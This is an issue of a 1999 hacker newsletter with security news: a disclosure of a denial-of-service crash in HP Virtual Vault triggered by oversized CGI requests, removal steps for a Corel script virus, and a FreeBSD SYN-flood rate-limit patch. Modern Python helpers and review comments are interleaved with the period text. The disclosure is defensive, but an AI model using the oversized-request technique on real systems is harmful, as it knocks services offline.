"It's a validation that they, too, see the need for risk-management services online. Fraud will only become a bigger and bigger issue as more shoppers come onto the Web." @HWA 50.0 [ISN] A ban on unauthorized computer access in Japan to be enacted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN mailing list Forwarded From: "Prosser, Mike" May 13, 1999 (TOKYO) -- Legislation to outlaw unauthorized access to computer networks will go into effect in Japan by the end of this year at the earliest, and the penalties will include fines or imprisonment. The bill, sponsored jointly by the National Police Agency, the Ministry of Posts and Telecommunications, and the Ministry of International Trade and Industry (MITI), was submitted to the Diet after it was adopted at a Cabinet meeting on April 16. It is expected to pass the Diet by the end of June. The concerned government agencies will make the bill to ban unauthorized access a new law, and not simply an amendment to the Criminal Law or the Telecommunications Business Law. Under the terms of the legislation, unauthorized access is defined as "any unauthorized logging in to a computer network using another person's ID or password, or any attack on a security hole in an operating system or application." The bill will ban such unauthorized access. The penalties will include imprisonment for up to one year or fines of up to 500,000 yen. (121.03 yen = US$1) Also, the bill will outlaw "any acts to promote unauthorized access" such as provision or sales of a user ID and password to a third party. In such cases, penalties will be fines of up to 300,000 yen. Even in the United States and Europe, where laws banning unauthorized access have already been enacted, few countries ban acts to promote unauthorized access. The bill will protect "all networked computers, those which control access with a user authentication via a user ID or password as well as authentication results" from unauthorized access. 
Networks will include the Internet, public circuits and corporate dedicated lines.

The new bill will not require corporate system administrators to "preserve log on records of protected computers," which the NPA has sought. Preservation of logs was excluded from the bill based on discussions among the three concerned parties. In November 1998, the NPA sought to require companies to preserve their log records, based on its view that "those to be protected by the bill and obliged parties are identical." However, many companies said that such a requirement would impose a tremendous burden on them and that it wouldn't necessarily help prevent unauthorized access. Nonetheless, companies will still be expected to make their best efforts to preserve log records to detect any unauthorized access at an early stage and minimize damages.

The bill will not have its intended effect unless companies take some measures to prevent unauthorized access. Therefore, the three parties decided to ask companies to implement voluntary efforts to take some measures to prevent unauthorized access. Specifically, system administrators are expected to manage passwords on a thorough basis, and to implement a variety of preventive measures. Although it is not legally binding, most system administrators will likely implement such preventive measures on a voluntary basis.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

51.0 Virtual Vault Vulnerable
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Virtual Vault Vulnerable
contributed by John Daniele

John Daniele has released a report that details a trivial DoS attack on HP's Virtual Vault operating system. Virtual Vault is a B1 and B2 DoD compliant system that is very popular with banks and e-commerce systems. HP claims to have addressed this problem in patch PHSS 10747, however numerous sites remain vulnerable.
TGAD DoS
http://www.faber.to/foo/vvos.htm

VirtualVault Overview

The VirtualVault operating system is HP's solution to secure electronic commerce. It is a B1 and B2 DoD compliant system that is becoming increasingly popular with big business, banks, etc. The main security mechanism on which VVOS is based is data partitioning. Data on the system is classified into one of four security classes, or 'vaults' -- INSIDE, OUTSIDE, SYSTEM and SYSTEM HIGH. The INSIDE vault houses the server's backend applications and databases. The OUTSIDE vault generally contains the internet front end and any necessary CGI binaries, etc. SYSTEM and SYSTEM HIGH are responsible for maintaining the external webpages and audit logs respectively. These vaults are totally segregated from each other and work essentially as separate machines. If a program requires access to either of the vaults it must be authenticated by HP's Trusted Gateway Proxy daemon. The TGP daemon filters all requests from the internet and forwards them to middleware server packages that safely reside behind the INSIDE vault.

TGA Bug

While the TGP daemon does a good job of ensuring the integrity of the request prior to forwarding data to its destination, the trusted gateway agent that is responsible for wrapping CGI requests does not check the length of the request prior to sending it to TGP. This poses a problem since TGA does not correctly handle request messages that are more than 512 bytes in length. The result is a trivial DoS attack on TGA and all services being wrapped by TGA.

The bug was discovered during a penetration test on a client system running VVOS 3.01. A post was made to a CGI application residing on the system with a large string of characters. This was then sent to the trusted gateway agent, causing the daemon to crash, leaving the Netscape Enterprise Server unable to service further HTTP/SSL requests.
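The length check the report says TGA is missing, together with a scan for the crash symptoms it describes, as an added example in Python (not HP's code): the 512-byte limit and the log strings are the report's, while the wrapper function, the finding names and the sample log lines are constructed for illustration.

```python
"""Added example, not HP's code: the request-length guard the report says the
trusted gateway agent (TGA) lacks, plus a detector for the crash symptoms in
NES and vvtga_log entries. The 512-byte limit and the error strings come from
the report; the sample log lines below are constructed."""
import re

TGA_MAX_REQUEST = 512  # report: TGA mishandles request messages longer than this


def wrap_cgi_request(method, path, query, limit=TGA_MAX_REQUEST):
    """Build the execution message for the gateway and refuse to forward one
    longer than `limit` bytes instead of handing it to the agent.
    Returns ('forward', message) or ('reject', reason)."""
    message = f"{method} {path}" + (f"?{query}" if query else "")
    size = len(message.encode("latin-1", "replace"))
    if size > limit:
        # Fail closed on the wrapper side: the client gets an error, TGA stays up.
        return ("reject", f"{size}-byte request exceeds the {limit}-byte TGA limit")
    return ("forward", message)


# NES 'security' entries: "[ts] security: for host H trying to METHOD /url"
NES_SECURITY = re.compile(
    r"^\[(?P<ts>[^\]]+)\] security: for host (?P<host>\S+) trying to "
    r"(?P<method>[A-Z]+) (?P<url>\S+)")
TGA_ERROR = "Failed to transfer execution message to TGA daemon"  # vvtga_log
NES_ACCEPT_FAIL = "Error accepting connection -5993"              # NES after restart


def find_tga_crash_indicators(log_lines, limit=TGA_MAX_REQUEST):
    """Scan mixed NES / vvtga_log lines and return (kind, detail) findings:
    an oversized CGI URL, the TGA transfer error, or the post-restart
    accept failure. Finding names are constructed for this example."""
    findings = []
    for line in log_lines:
        m = NES_SECURITY.match(line)
        if m:
            url = m.group("url").rstrip(",")
            if len(url) > limit:  # the URL alone already exceeds what TGA tolerates
                findings.append(("oversized_cgi_request",
                                 f"{m.group('host')} sent a {len(url)}-byte URL"))
        if TGA_ERROR in line:
            findings.append(("tga_transfer_failure", line.strip()))
        if NES_ACCEPT_FAIL in line:
            findings.append(("nes_accept_failure", line.strip()))
    return findings


# Constructed sample: one oversized request, the vvtga_log error, then the
# entries NES writes after a restart (the host is a placeholder, as in the report).
SAMPLE_LOG = [
    "[07/May/1999:16:16:22] security: for host xxx.xxx.xxx.xxx trying to GET "
    "/cgi-bin/somecgi.cgi?" + "A" * 600 + ",",
    "ERROR: setup_connection(): Failed to transfer execution message to TGA daemon",
    "[07/May/1999:16:28:18] info: successful server startup",
    "[07/May/1999:16:33:18] failure: Error accepting connection -5993 "
    "(Resource temporarily unavailable)",
]

if __name__ == "__main__":
    for kind, detail in find_tga_crash_indicators(SAMPLE_LOG):
        print(kind, "-", detail[:80])
```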
The NES logs show the following:

    [07/May/1999:16:16:22] security: for host xxx.xxx.xxx.xxx trying to GET /cgi-bin/somecgi.cgi?AAAAAAAAAAAAAAA...,

vvtga_log reports:

    ERROR: setup_connection(): Failed to transfer execution message to TGA daemon

And when NES is started back up:

    [07/May/1999:16:28:18] info: successful server startup
    [07/May/1999:16:28:18] info: Netscape-Enterprise/3.5.1G B98.169.2301
    [07/May/1999:16:33:18] failure: Error accepting connection -5993 (Resource temporarily unavailable)

FIX

Chris Hudel of HP was notified of this bug on Wednesday May 12, 1999. He stated that HP was aware of the problem and addressed it in patch PHSS 10747. However, I am not aware of HP releasing an official 'bug report' on this issue. Since I have encountered several VVOS systems this past week that have not been patched, and sysadmins unaware of this bug and patch, I decided to post the details publicly.

NOTE: I have not tested this bug against PHSS 10747 and would appreciate input from those who have at foo@faber.to.

- John Daniele
  jdaniele@kpmg.ca

@HWA

52.0 GaLaDRiel PoC (Proof of concept) Corel virus resurfaces in the wild
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Corel Scripts Infected by New Virus
contributed by tetricycle

The GaLaDRiel (or C.S.Gala) virus infects the script language used by Corel products. This particular version is not malicious and only displays a text message. The message is only displayed on June 6 and contains seven lines from J.R.R. Tolkien's The Lord of the Rings.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html

Virus Infects Corel Scripts
Virus is low risk, not easily spread, and causes minor damage.
by Stan Miastkowski, special to PC World
May 13, 1999, 6:38 p.m. PT

A new wrinkle in computer viruses appeared this week with the discovery of a virus that infects the script language used by Corel products.
But experts say the GaLaDRiel (or C.S.Gala) virus will affect few users, and is not destructive. The virus is not contained in the company's applications, according to a Corel representative. You can get it only by receiving an infected script file from another user via disk or download. When it triggers, all the virus does is display text.

GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for Network Associates, maker of McAfee Antivirus. The virus is rare, doesn't spread easily, and causes minimal damage, Viveros says.

Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't launch automatically. You have to run the infected script for it to spread. And the virus doesn't infect program files. After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only, displaying seven lines from J.R.R. Tolkien's The Lord of the Rings. As far as virus researchers have been able to ascertain, GaLaDRiel does nothing else.

All major developers of antivirus software plan to add detection and removal of GaLaDRiel to their latest virus updates within the next two weeks.

How to Check for the Virus

Corel recommends taking the following steps to see if your scripts have been infected and to remove the virus if they have been:

1. Using Windows Explorer, browse the directory that contains the potentially infected scripts.
2. Right-click on a Corel script .csc file and select Open.
3. When the Corel Script Editor opens, examine the first line of the script. If the text begins with REM ViRUS GaLaDRiel, then your script is infected.
4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM END OF ViRUS.
5. Resave your Corel Script file with the same name, overwriting the infected version.
6. Repeat the above steps for all .csc files in the same directory.
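The six manual steps above, automated as an added example (my code, not Corel's or PC World's): it relies only on the two marker strings the article gives, REM ViRUS GaLaDRiel and REM END OF ViRUS, treats a file as infected only when its first line starts with the first marker (Corel's own test), strips the marked block from every .csc file in a directory, and refuses to modify a file that has a start marker but no end marker rather than guess where the virus ends. The sample scripts it writes are constructed; the line between the markers is a stand-in for the virus body, not the real thing.

```python
import os
import tempfile

# Markers quoted in the Corel clean-up instructions.
START_MARK = "REM ViRUS GaLaDRiel"
END_MARK = "REM END OF ViRUS"


def is_infected(script_text):
    """Corel's test: an infected script's first line begins with START_MARK."""
    first = script_text.splitlines()[0] if script_text else ""
    return first.strip().startswith(START_MARK)


def disinfect(script_text):
    """Drop every line from START_MARK through END_MARK inclusive.
    Returns (clean_text, lines_removed). Raises if the block is unterminated,
    so a truncated or mutated sample is left alone for a human to inspect."""
    out, removed, inside = [], 0, False
    for line in script_text.splitlines(keepends=True):
        stripped = line.strip()
        if not inside and stripped.startswith(START_MARK):
            inside = True
        if inside:
            removed += 1
            if stripped.startswith(END_MARK):
                inside = False
            continue
        out.append(line)
    if inside:
        raise ValueError("start marker without end marker; script not modified")
    return "".join(out), removed


def clean_directory(directory):
    """Disinfect every .csc file in `directory` (all of them, because running
    one infected script infects the rest). Returns {filename: lines_removed}."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(".csc"):
            continue
        path = os.path.join(directory, name)
        with open(path, encoding="latin-1") as fh:
            text = fh.read()
        if not is_infected(text):
            report[name] = 0
            continue
        clean, removed = disinfect(text)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(clean)
        report[name] = removed
    return report


# Constructed sample scripts; the middle REM line stands in for the virus body.
SAMPLE_INFECTED = (
    "REM ViRUS GaLaDRiel\n"
    "REM (stand-in for the virus body)\n"
    "REM END OF ViRUS\n"
    "MESSAGE \"hello\"\n"
)
SAMPLE_CLEAN = "MESSAGE \"hello\"\n"


def demo():
    """Write one infected and one clean sample to a temp dir, clean it, and
    return (report, contents of the formerly infected file)."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "bad.csc"), "w", encoding="latin-1") as fh:
        fh.write(SAMPLE_INFECTED)
    with open(os.path.join(d, "good.csc"), "w", encoding="latin-1") as fh:
        fh.write(SAMPLE_CLEAN)
    report = clean_directory(d)
    with open(os.path.join(d, "bad.csc"), encoding="latin-1") as fh:
        cleaned = fh.read()
    return report, cleaned


if __name__ == "__main__":
    print(demo())
```

Point clean_directory() at the real script directory instead of the temp dir. The first-line test follows Corel's instructions exactly; a variant that inserts itself elsewhere in the file would need the scan widened, which is why disinfect() itself looks for the marker anywhere.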
(This final step is important, because running any infected Corel Script file will infect all other .csc files in the same directory.) @HWA 53.0 DoD labels attacks as 'nuisance' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ DOD Labels Attacks as "Nuisance" contributed by erewhon The Defense Information Agency's Joint Task Force for Computer Network Defense has labeled the recent attacks of DOD web sites by Chinese individuals as nothing more than a nuisance and that the attacks have had "no operational impact or effect." Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0510/web-nuisance-5-13-99.html MAY 13, 1999 . . . 18:40 EDT Pentagon confirms 'nuisance' cyberattacks BY BOB BREWIN (antenna@fcw.com) The Pentagon identified what it called "nuisance-level" attacks against its World Wide Web sites that resemble the attacks by Chinese hackers against sites operated by the departments of Energy and Interior earlier this week. In response to a query from FCW about any Chinese attacks against DOD Web sites, a spokeswoman for the Defense Information Agency's Joint Task Force for Computer Network Defense said, "We're aware of the activities you mention. The JTF-CND has only a few isolated reports of activities across DOD which might be attributed to these sources. The damage has been at the 'nuisance level' with no operational impact or effect." The spokeswoman added that the JTF-CND would take action only when such attacks would have a "widespread effect" on the Defense Information Infrastructure, which comprises global DOD networks and information systems, or when such attacks are spread broadly across network or information systems operated by more than one of the services. According to nongovernment network security experts, Chinese hackers launched Web attacks earlier this week in response to the U.S. bombing of the Chinese embassy in Belgrade. 
@HWA

54.0 GPS's Y2K crisis comes early
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Jan 1, 2000 or Aug 21, 1999, which is worse?

contributed by Time L0rd

By now everyone has heard of Y2K. How many have heard of August 21? That is the date when many handheld GPS systems may go wacko. The GPS satellites keep track of dates by measuring the number of weeks elapsed since January 5-6, 1980. Every 1,024 weeks, the timer will reset to zero. The first time this will happen is August 21. People suspect that older GPS units may not be able to read this time accurately. (I knew there was a reason I waited to buy one)

CNN

Experts say consumers may be hardest hit by GPS computer time change

May 12, 1999
Web posted at: 7:35 PM EDT (2335 GMT)

WASHINGTON (AP) -- By now everyone knows about computers and midnight, December 31. But what's going to happen on August 21? That's when computer clocks roll over in the Global Positioning System, the network of satellites that keeps ships and nuclear missiles on course and provides precise time measurements for computer networks and public utilities.

A joint congressional subcommittee held a hearing Wednesday to assess the potential impact. It heard that while the military and space communities are ready for the adjustment, consumers and small businesses may be the hardest hit.

The Global Positioning System is made up of 24 orbiting satellites that allow anyone with a GPS receiver to pinpoint their position on Earth. The satellites keep track of dates by measuring the number of weeks elapsed since January 5-6, 1980. Every 1,024 weeks, the timer will reset to zero, which will occur for the first time as August 21 turns to August 22.

"The satellites will not fall out of the sky, they will not lose their power," Keith Rhodes, technical director in the Office of the Chief Scientist at the General Accounting Office, told members of the House Science and Government Reform committees.
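The week-counter arithmetic behind the rollover, as an added example (my code, not from the CNN/AP piece or any receiver vendor): the broadcast week number is a 10-bit field counting weeks from 00:00 UTC on Sunday 6 January 1980, so it wraps from 1023 to 0 after 1,024 weeks. The first function decodes it the way a rollover-unaware receiver does and lands in 1980; the second picks the 1,024-week cycle that puts the result on or after a date the receiver can trust, for which a firmware build date is assumed here. Leap seconds between GPS time and UTC are ignored to keep the example about the week counter.

```python
from datetime import datetime, timedelta

# GPS epoch: week 0 began at 00:00 UTC on Sunday, 6 January 1980.
GPS_EPOCH = datetime(1980, 1, 6)
WEEK_MODULUS = 1024                 # the broadcast week number is a 10-bit field
SECONDS_PER_WEEK = 7 * 24 * 3600

# Assumption for this example: a receiver knows its firmware cannot have been
# built before this date, so any decoded time earlier than it must be a rollover.
FIRMWARE_BUILD = datetime(1999, 1, 1)


def first_rollover():
    """Instant at which the 10-bit week counter first wraps from 1023 to 0."""
    return GPS_EPOCH + timedelta(weeks=WEEK_MODULUS)


def gps_week(utc):
    """(full week count, 10-bit value actually broadcast) for a UTC instant."""
    if utc < GPS_EPOCH:
        raise ValueError("before the GPS epoch")
    full = (utc - GPS_EPOCH).days // 7
    return full, full % WEEK_MODULUS


def gps_to_utc_naive(week10, tow_seconds):
    """What a rollover-unaware receiver does: treat the 10-bit week as absolute."""
    return GPS_EPOCH + timedelta(weeks=week10, seconds=tow_seconds)


def gps_to_utc(week10, tow_seconds, not_before):
    """Rollover-aware decode: add whole 1024-week cycles until the result is
    on or after `not_before`, a date the receiver trusts (e.g. its build date)."""
    if not 0 <= week10 < WEEK_MODULUS:
        raise ValueError("week number must fit in 10 bits")
    if not 0 <= tow_seconds < SECONDS_PER_WEEK:
        raise ValueError("time of week out of range")
    candidate = GPS_EPOCH + timedelta(weeks=week10, seconds=tow_seconds)
    while candidate < not_before:
        candidate += timedelta(weeks=WEEK_MODULUS)
    return candidate


if __name__ == "__main__":
    # Constructed fix: week field 0, time-of-week 0 -- the first second after rollover.
    print("first rollover:", first_rollover())
    print("naive decode of week 0:", gps_to_utc_naive(0, 0))
    print("aware decode of week 0:", gps_to_utc(0, 0, FIRMWARE_BUILD))
```

The trusted date is the whole trick: a receiver built in 1995 that hard-codes nothing will decode week 0 as 1980 and compute ephemerides for the wrong date, which is the failure the article predicts for older handhelds. The same ambiguity returns every 1,024 weeks, so the reference date has to move forward with each firmware release.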
"The problem will be on the ground, with what you hold in your hand." Handheld receivers such as those popular with mountaineers, sailors and some motorists are "probably going to have a problem" if they are more than five years old, Rhodes said. Also vulnerable are small computer networks that rely on GPS time signals, a desirable form of time measurement because they are accurate to within three-billionths of a second. More widespread computer problems are expected a little more than four months later, when the calendar changes from December 31, 1999, to January 1, 2000 -- the Y2K witching hour. Many computers originally programmed to recognize only the last two digits of a year will not work properly beginning January 1, 2000, when some machines will assume it is 1900 and could therefore malfunction. @HWA 55.0 Retinal Scans? ~~~~~~~~~~~~~~ Forget giving your sister your atm card to grab you some cash when you can't get out... From HNN http://www.hackernews.com/ "Prepare for Retina Scan" contributed by Shatner No ATM card or PIN numbers needed. Bank United, based in Texas, is the first to offer Iris scans at its ATMs for its customers. Just walk up to the ATM, let the computer check out your eyeball and withdraw some dough. In response to questions about privacy concerns, Bank United said the iris pictures will not be distributed to anyone outside the bank. (Unless they get subpoenaed or cracked, of course.) Nando Times http://www.techserver.com/story/body/0,1634,48513-78144-556814-0,00.html Texas bank offers 1st eye-recognition ATM in U.S. Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TERRI LANGFORD HOUSTON (May 13, 1999 6:03 p.m. EDT http://www.nandotimes.com) - If you can't tell twins Michael and Richard Swartz apart, do what Bank United of Texas does - look them in the eye. 
On Thursday, the bank became the first in the United States to offer iris recognition technology at automated teller machines, providing the Swartzes and other customers a cardless, password-free way to get their money out of an ATM. "It knows you just by looking at you," said Ron Koben, Bank United executive vice president. The concept works because the intricate pattern of each person's iris is more distinctive than even a fingerprint. Here's how it works: A customer has a close-up photo of his eye taken at the bank, and the picture is stored in a computer. When the customer goes up to the ATM to take out money, he presses a button to start an eye scan. The ATM then matches the picture of the iris with the one stored in the bank's database to confirm the customer's identity. To demonstrate, Richard Swartz, a 25-year-old Rice University graduate student, had his iris photographed by a bank employee. Minutes later, Swartz was able to withdraw $40 from his account without inserting a card or punching in a secret code. Then, Swartz's brother Michael walked up to the machine. But since his iris didn't match his brother's, the ATM refused access. Iris identification is already used at 11 banks outside the United States and may eventually be extended to many other kinds of financial transactions. Bank United hopes to have more eye-scanning ATMs up and running within the next year. Several other banks in the United States are expected to unveil iris identification teller machines later this year. "It has a very high cool factor," Koben said. "We think of it as James Bond meets stocks and bonds." The iris recognition and software process was invented a few years ago by John Daugman of Cambridge University in England. It is marketed in this country to financial institutions by Sensar Inc. of Moorestown, N.J.
"This event clearly establishes iris identification as the emerging standard in personal electronic identfication," said Robert Van Naarden, Sensar vice president of marketing and customer service. "Iris identification is the most secure, robust and stable form of identification known to man." In response to questions about privacy concerns, Bank United said the iris pictures will not be distributed to anyone outside the bank. @HWA 56.0 FreeBSD high speed SYNflood patch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Date: Thu, 13 May 1999 11:35:43 -0700 Reply-To: Richard Steenbergen Sender: Bugtraq List From: Richard Steenbergen Subject: SYN floods against FreeBSD To: BUGTRAQ@netspace.org Here's a quickie for the people who have been plagued with high bandwidth syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits SYN processing. Its messy but functional and I don't have time to make it better (thats the fbsd developers job, not mine :P), cd /usr/src/sys, patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be available (default to 100). This is the maximium number of SYNs per second that will be processed, the rest will be silently discarded. On my test system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), this has successfully brought CPU usage from 100% to ~20% (against an open port which is replying with unacknowledged ACKs). Which brings us to the more sticky topic of kernel panics when under SYN flood (which I believe to be the cause of some earlier posts from certain people at Exodus Communications *cough*). 
Lord knows I found enough of them when doing this testing, but the one that seems to be the biggie for crashing when under syn flood is as follows (heh just turned off the synlim and panic'd within 8 seconds while writing this):

panic: free: multiple frees
(kgdb) bt
#0 boot (howto=256) at ../../kern/kern_shutdown.c:285
#1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees") at ../../kern/kern_shutdown.c:446
#2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330) at ../../kern/kern_malloc.c:333
#3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262
#4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236
#5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0, netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536
#6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610) at ../../netinet/in_rmx.c:242
#7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , w=0xc0231610) at ../../net/radix.c:956
#8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283
#9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124

Which after a quick examination seems to be a periodic routing table cleanup. It seems that in_rtqtimo is scheduled to run every net.inet.ip.rtexpire seconds (which is dynamically adjusted and can never go lower than net.inet.ip.rtminexpire). When the system is under heavy load from processing lots of small packets (they don't even have to be SYNs, anything which can get routed will do the trick, though the packet kiddies would get very little gain from just sending an ip header since it's going to be padded to 64 bytes for the eth frame anyhow), this route cleanup code will go wacking at routes it shouldn't and free some memory twice. In the course of testing I've gotten my rtq_reallyold to -3 and seen lots of "tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with free time or more specific knowledge of this area would like to FIX IT?
=) Perhaps when I get more free time I'll test some other *nix's. I would really recommend putting all this rate limiting code at an ipfw level. If you would like to contact me regarding this please use humble@quadrunner.com (at least if you want a quick reply), thanks. -- Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 http://users.quadrunner.com/humble synlim *** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ ! 
#define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. 
+ */ + + if ((unsigned int)dticks > hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1); @HWA 57.0 Industry rises up against MP3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I was waiting for this, it took them long enough but it looks like industry is finally waking up to the threat of MP3 and are beginning to make some noise about it. MUSIC BIZ BUILDS A TIME BOMB (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19682.html The Recording Industry Association of America is out to exterminate MP3 -- and is pressuring hardware and software makers to build in a "kill switch" that would take care of it once and for all. By Christopher Jones. Music Biz Builds A Time Bomb by Christopher Jones 3:00 a.m. 14.May.99.PDT The future of digital music delivery is at stake as technology companies and record labels try to bridge their multibillion-dollar industries. But the two sides are making little progress, reports one tech- industry insider, who says that the music industry is taking a "my way or the highway" approach. Facing the loss of its lucrative distribution chains and existing contracts with retailers, the record industry has a plan to force hardware and software companies to exclusively adopt its Secure Digital Music Initiative as the standard for delivering music online. 
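Review bot: in the tcp_var.h hunk that adds `#ifdef KERNEL` / `#include "opt_syn_ratelim.h"`, that header will never exist, because the conf/options hunk adds `SYN_RATELIM` with no header-file name (the line under `ICMP_BANDLIM`), and config(8) routes options listed without a file name into opt_global.h rather than generating a per-option header. Either write the options line as `SYN_RATELIM opt_syn_ratelim.h`, or drop the include and rely on opt_global.h the way ICMP_BANDLIM does.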
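Review bot: the prototype hunk in tcp_input.c adds `static int syn_ratelim(void);` outside any `#ifdef SYN_RATELIM`, while the definition that follows is inside one, so a kernel built without the option carries a static declaration with no definition (a "declared static but never defined" warning, and no way to build -Werror). Wrap the prototype in the same `#ifdef SYN_RATELIM`, and add the `static` keyword to the `int syn_ratelim(void)` definition so the two agree.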
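Review bot: in the syn_ratelim() hunk, the opening comment says "argument out of ranage" but the function takes no argument and only tests `synlim <= 0`; fix the wording and the typo. The more important point for anyone enabling this is that `lticks`/`lpackets` form a single global window, so once `lpackets` passes `synlim` every SYN to every port is dropped for the remainder of that second, legitimate connection attempts included; the covering e-mail says so, but the description string handed to SYSCTL_INT is `""`, so a one-line description such as "max SYNs/sec accepted, excess silently dropped" belongs there.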
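Review bot: the hook hunk in tcp_input() is placed so that it breaks IPFIREWALL_FORWARD. The context shows `} else` immediately before `#endif /* IPFIREWALL_FORWARD */`, and the new `#ifdef SYN_RATELIM` / `if ((tiflags & TH_SYN) && !(tiflags & TH_ACK))` / `if (syn_ratelim() < 0) goto drop;` / `#endif` is inserted between that `else` and `inp = in_pcblookup_hash(...)`. With both options defined the `else` now binds to the new `if`, and `inp = in_pcblookup_hash(...)` runs unconditionally, overwriting the pcb the forwarding branch just chose. Move the rate-limit check above the `#ifdef IPFIREWALL_FORWARD` block, or put braces around the original else branch. Also, `goto drop` records nothing; bump a counter (a new tcpstat field, say) so operators can tell that the limiter, and not the network, is discarding SYNs.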
